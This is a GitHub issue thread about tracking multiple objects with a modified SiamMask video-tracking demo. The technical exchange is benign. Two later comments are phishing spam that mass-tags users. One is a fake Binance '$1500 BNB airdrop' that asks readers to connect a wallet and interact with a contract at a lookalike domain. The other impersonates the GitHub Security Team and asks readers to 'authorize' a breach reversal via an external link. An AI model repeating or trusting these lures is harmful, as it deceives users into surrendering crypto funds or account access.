### ISSUE TITLE
Does your new-demo.py include tracking multiple objects?

### ISSUE THREAD

**Issue by SamihaSara** [maazullah96/files#1]
Can I  track multiple objects and track them throughout the video?  Also, can I get the tracking results (bbox, mask, etc?) from this code?

**Comment by maazullah96** [comment]
I have modified the code to get the multiple tracking objects from video

**Comment by maazullah96** [comment]
you have to use Siammask original repository to track the object.These files are modified by me in the siammask repository to track multiple objects.If your siammask is working properly i can help you track multiple objects.

**Comment by SamihaSara** [comment]
Yes, my siammask is working properly. Please provide further info. Firstly, How did you figure out you to change this files only in the original repo to track multiple objects?

**Comment by maazullah96** [comment]
Try to use this repository https://github.com/maazullah96/SiamMaskUpdated using start file as a Demon.py  with the same settings as you have done for SiamMask original repository

**Comment by lifuzhang1108** [comment]
Could you specify the version of tensorflow and imageai you used?

**Comment by maazullah96** [comment]
Sorry bro for the late reply .I think you can remove imageai part as well i dont think its being used for something useful.I was just testing it

**Comment by sulthanallaudeen** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @RohanNero, @sudharsanan54, @AsifMushtaq, @desmondboom, @timartlaw, @HikaRiwwww, @TorresFond, @NicodemusDu, @Boris666w3, @TGJOJO, @stoicHead, @Angie-96, @pleaner, @parsasarfarazi, @go-liv, @AnwarSalam72, @fahammed-dev, @ShadowsHe, @ahbabshahin, @LaughInWind, @danisev7, @joaorafaelm, @flap93, @hobbescodes, @zhuchongyue, @nkg-dev, @pvfarooq, @Wooxed, @Bhati90, @Ryannhasacat, @TeddyHarks, @harjeetsangwan, @JabraneSaad, @quy267, @Kevinxu99, @jiangmingz, @anvincs, @alaomastack, @testipa, @ShayanJamil519, @Slavaa00, @MistaTino, @l0hitk, @Alonso-dav, @VolketGamer, @Yzc4955, @Boldbash, @theshanz, @arpancodes, @eechev

**Comment by dawinSoft** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
raahimSal, @btall, @dwojcik92, @Rapithwin, @rsarai, @oisinmulvihill, @sosisoon, @0xfiending, @aprilahijriyan, @cernajs, @macmac148, @taruscript, @nasjp, @Kevin161111, @notaquant, @Davi0k, @ryanwangJC, @jo-tm, @selmison, @xiaojay
